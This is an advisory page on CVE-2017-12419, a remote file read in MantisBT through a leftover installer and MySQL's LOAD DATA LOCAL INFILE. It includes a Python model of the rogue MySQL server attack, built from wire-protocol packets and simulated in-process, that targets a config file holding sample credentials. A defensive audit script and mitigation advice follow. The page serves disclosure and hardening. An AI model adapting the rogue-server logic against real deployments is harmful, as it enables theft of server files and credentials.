CVE-2017-12419 in MantisBT
Summary
by MITRE
If, after successful installation of MantisBT through 2.5.2 on MySQL/MariaDB, the administrator does not remove the 'admin' directory (as recommended in the "Post-installation and upgrade tasks" section of the MantisBT Admin Guide), and the MySQL client has a local_infile setting enabled (in php.ini mysqli.allow_local_infile, or the MySQL client config file, depending on the PHP setup), an attacker may take advantage of MySQL's "connect file read" feature to remotely access files on the MantisBT server.
Analysis
by VulDB Data Team • 01/07/2021
This vulnerability affects MantisBT 2.5.2 and earlier installed on MySQL or MariaDB when the admin directory, which holds the web installer (admin/install.php), is left in place after installation. The "Post-installation and upgrade tasks" section of the Admin Guide tells administrators to remove that directory; where they do not, the installer stays reachable and accepts database connection parameters, including the database host, from anyone who can reach the web application. On its own that is a misconfiguration; combined with a MySQL client that honours LOAD DATA LOCAL INFILE requests it becomes a remote file read that needs no MantisBT account.
The exploitation mechanism is MySQL's "connect file read", better known as the rogue MySQL server attack. In the MySQL client/server protocol a server may answer a query with a LOAD DATA LOCAL INFILE request that names a file; a client with local_infile enabled then reads that file from its own filesystem and sends the contents to the server. The file is therefore read on the client side, here the web server running MantisBT, not on the database server. An attacker who can reach the leftover installer supplies the address of a MySQL server they control as the database host; when the installer connects and issues its first query, the rogue server replies with a LOCAL INFILE request for any path of the attacker's choosing, for instance config/config_inc.php, and mysqli sends the file's contents back. No SQL injection and no valid database credentials are involved: whether the client honours the request is decided by mysqli.allow_local_infile in php.ini, or by the client library's local_infile setting when mysqli is built against libmysqlclient.
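The exchange just described, modelled in Python as an added example (it is not code from VulDB, MITRE or the MantisBT project): a rogue server that answers any query with a LOCAL INFILE request, and a client that either honours it, as mysqli does with allow_local_infile on, or refuses it the way mysqlnd does, by sending the end-of-data marker and raising a local error. Packet layouts follow the MySQL wire protocol; the server version, salts, target path and file contents are constructed, and the client is a simplified model rather than mysqlnd itself.

```python
"""In-process model of the MySQL 'connect file read' behind CVE-2017-12419.

A rogue server answers the client's first query with a LOAD DATA LOCAL INFILE
request; the client (the web server running MantisBT's installer) reads the
named file from its own disk and ships it to the server. Both sides are
simulated, no sockets; every value (version, salts, path, file) is constructed.
"""
import struct

CLIENT_LOCAL_FILES = 0x80          # capability bit: client will honour LOCAL INFILE requests
CLIENT_PROTOCOL_41 = 0x200
CLIENT_SECURE_CONNECTION = 0x8000

OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"    # OK, 0 rows, 0 insert-id, autocommit, 0 warnings
ERR_PACKET = b"\xff\x28\x04#HY000Unexpected"   # ERR, code 1064, SQL state, message


def handshake_v10(server_version: bytes = b"5.7.21", conn_id: int = 7) -> bytes:
    """Initial handshake the server sends first; advertises CLIENT_LOCAL_FILES."""
    caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES
    p = b"\x0a" + server_version + b"\x00" + struct.pack("<I", conn_id)
    p += b"A" * 8 + b"\x00"                                 # auth-plugin-data part 1, filler
    p += struct.pack("<HBH", caps & 0xFFFF, 0x21, 0x0002)    # caps low, utf8 charset, status
    p += struct.pack("<HB", caps >> 16, 21) + b"\x00" * 10   # caps high, plugin data len, reserved
    return p + b"B" * 12 + b"\x00" + b"mysql_native_password\x00"


def local_infile_request(path: str) -> bytes:
    """Server -> client: 0xFB then the path the client is told to read and send back."""
    return b"\xfb" + path.encode()


class RogueServer:
    """Answers any COM_QUERY with a LOCAL INFILE request for `target`; keeps what comes back."""

    def __init__(self, target: str):
        self.target, self.captured, self.phase = target, b"", "auth"

    def handle(self, payload: bytes) -> bytes:
        if self.phase == "auth":                    # HandshakeResponse41: accept any credentials
            self.phase = "query"
            return OK_PACKET
        if self.phase == "query" and payload[:1] == b"\x03":   # COM_QUERY; its text is irrelevant
            self.phase = "file"
            return local_infile_request(self.target)
        if self.phase == "file":
            if payload == b"":                      # empty packet marks end of file data
                self.phase = "query"
                return OK_PACKET
            self.captured += payload                # the leaked bytes
            return b""                              # server stays silent until the EOF marker
        return ERR_PACKET


class ClientSim:
    """Simplified mysqli/mysqlnd client; `files` stands in for the web server's filesystem.
    The refusal path follows mysqlnd: send the EOF marker, then report an error locally."""

    def __init__(self, files: dict, allow_local_infile: bool):
        self.files, self.allow_local_infile, self.error = files, allow_local_infile, None

    def run_query(self, server: RogueServer, sql: str) -> bytes:
        """Connect, run one query, follow whatever the server answers; returns the final reply."""
        caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION
        if self.allow_local_infile:                 # mysqli.allow_local_infile=On sets this bit
            caps |= CLIENT_LOCAL_FILES
        login = struct.pack("<IIB", caps, 1 << 24, 0x21) + b"\x00" * 23 + b"mantis\x00" + b"\x00"
        if server.handle(login)[:1] != b"\x00":
            raise RuntimeError("login rejected")
        reply = server.handle(b"\x03" + sql.encode())
        if reply[:1] != b"\xfb":                    # ordinary result set or OK; nothing to leak
            return reply
        path = reply[1:].decode()
        if not self.allow_local_infile or path not in self.files:
            self.error = f"LOAD DATA LOCAL INFILE forbidden or unreadable: {path}"
            return server.handle(b"")               # EOF marker keeps the protocol in sync
        server.handle(self.files[path])             # the leak: file bytes leave the web server
        return server.handle(b"")


# Constructed sample: the file an attacker would ask for first.
TARGET = "/var/www/mantisbt/config/config_inc.php"
SAMPLE_FILES = {TARGET: b"<?php\n$g_db_username = 'mantis';\n$g_db_password = 'hunter2';\n"}


def demo(allow_local_infile: bool):
    """Returns (bytes the rogue server captured, client-side error or None)."""
    server, client = RogueServer(TARGET), ClientSim(SAMPLE_FILES, allow_local_infile)
    client.run_query(server, "SELECT 1")            # any query triggers the request
    return server.captured, client.error


if __name__ == "__main__":
    for setting in (True, False):
        captured, err = demo(setting)
        print(f"allow_local_infile={setting}: captured {len(captured)} bytes, error={err}")
```

The point to take from the model is in `ClientSim.run_query`: the client never checks that its own query was a LOAD DATA statement, it simply acts on the 0xFB byte, so the only thing between the rogue server and the file is the allow_local_infile setting.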
The impact is a remote, unauthenticated read of any file the web server process can open: MantisBT's configuration file with the database credentials, the rest of the application source, and system files outside the web root. Credentials and secrets recovered this way give the attacker a path to the real database and from there to further compromise. The preconditions were common at the time: the admin directory is left behind by every install and upgrade unless the administrator carries out the post-installation task, and mysqli.allow_local_infile defaulted to On in PHP releases before 7.2.16 and 7.3.3. All the attacker needs is network access to the web application's admin directory.
Mitigation is the post-installation task the Admin Guide already prescribes: delete the admin directory once installation or upgrade is complete, and delete it again after every upgrade that restores it. Independently of that, set mysqli.allow_local_infile to Off in php.ini (and local-infile=0 in the [client] section of the MySQL client configuration where mysqli is built against libmysqlclient) unless an application genuinely needs LOAD DATA LOCAL, and upgrade MantisBT to a release later than 2.5.2. Restricting access to the web application through network segmentation and firewall rules limits who can reach a forgotten installer, and periodic audits should look for the admin directory reappearing after upgrades. VulDB maps this vulnerability to CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') and CWE-73 External Control of File Name or Path; on the ATT&CK side it corresponds to T1005 Data from Local System, since what the attacker obtains is file contents taken from the web server. The remediation strategy is therefore hardening of both the application deployment and the database client configuration, with regular assessments that catch the same pair of misconfigurations before an attacker does.
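An added audit script, not part of this page or of the MantisBT project, that checks the two preconditions above on a web root: a leftover admin directory and an effectively enabled mysqli.allow_local_infile, using the PHP default (On before 7.2.16 and 7.3.3, Off from those releases) when php.ini is silent. The optional my.cnf check applies to builds where mysqli uses libmysqlclient; the web root layout, php.ini and my.cnf texts are constructed samples.

```python
"""Post-install audit for the two misconfigurations CVE-2017-12419 depends on.

Checks a MantisBT web root for a leftover admin/ directory and decides whether
mysqli.allow_local_infile is effectively on, taking the PHP default into account
(On before PHP 7.2.16 / 7.3.3, Off from those releases on). Paths and sample
configuration texts are constructed for this example.
"""
from pathlib import Path
import tempfile

PHP_TRUE = {"1", "on", "yes", "true"}          # values PHP's ini parser treats as boolean true


def parse_ini(text: str) -> dict:
    """Minimal ini reader: returns {section: {key: value}}; '' is the global section."""
    conf, section = {"": {}}, ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].split("#", 1)[0].strip()   # php.ini and my.cnf comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            conf[section][key.lower()] = value.strip('"\'')
        else:
            conf[section][line.lower()] = "1"     # bare option (my.cnf style) means enabled
    return conf


def php_default_local_infile(php_version: tuple) -> bool:
    """PHP flipped the mysqli.allow_local_infile default to Off in 7.2.16 and 7.3.3."""
    v = tuple(php_version)
    default_off = (7, 2, 16) <= v < (7, 3, 0) or v >= (7, 3, 3)
    return not default_off


def mysqli_local_infile_enabled(php_ini_text: str, php_version: tuple) -> bool:
    """Effective mysqli.allow_local_infile: an explicit ini value wins, else the PHP default."""
    values = {}
    for section in parse_ini(php_ini_text).values():   # php.ini section headers are cosmetic
        values.update(section)
    if "mysqli.allow_local_infile" in values:
        return values["mysqli.allow_local_infile"].lower() in PHP_TRUE
    return php_default_local_infile(php_version)


def mycnf_local_infile(mycnf_text: str):
    """libmysqlclient builds also read [client]/[mysql]; True/False if set there, else None."""
    conf = parse_ini(mycnf_text)
    for section in ("client", "mysql"):
        value = conf.get(section, {}).get("local-infile")
        if value is not None:
            return value.lower() in PHP_TRUE
    return None


def audit(webroot: Path, php_ini_text: str, php_version: tuple, mycnf_text: str = "") -> list:
    """Returns a list of findings; an empty list means both preconditions are closed."""
    findings = []
    if (webroot / "admin").is_dir():
        findings.append("admin/ directory still present: installer reachable, remove it")
    if mysqli_local_infile_enabled(php_ini_text, php_version):
        findings.append("mysqli.allow_local_infile is effectively On: set it Off in php.ini")
    if mycnf_local_infile(mycnf_text):
        findings.append("[client] local-infile enabled in my.cnf: set local-infile=0")
    return findings


# Constructed samples: a php.ini with no explicit setting (only a commented-out one),
# a hardened php.ini, and a my.cnf that enables the feature with a bare option.
INI_UNSET = "[PHP]\nmemory_limit = 128M\n; mysqli.allow_local_infile = On\n"
INI_HARDENED = "[PHP]\nmysqli.allow_local_infile = Off\n"
MYCNF_BAD = "[client]\nlocal-infile\n"
MYCNF_GOOD = "[client]\nlocal-infile=0\n"


def demo() -> dict:
    """Builds a throw-away web root with admin/ left behind and audits it before and after hardening."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "admin").mkdir()
        before = audit(root, INI_UNSET, (7, 1, 0), MYCNF_BAD)
        (root / "admin").rmdir()                              # the post-install task
        after = audit(root, INI_HARDENED, (7, 1, 0), MYCNF_GOOD)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings or "clean")
```

Run it against a real deployment by pointing `audit` at the MantisBT web root, the output of `php --ini` for the php.ini path, and `php -v` for the version; a commented-out `; mysqli.allow_local_infile = On` line, as in the sample, does not count as a setting, which is exactly the case where the PHP default decides.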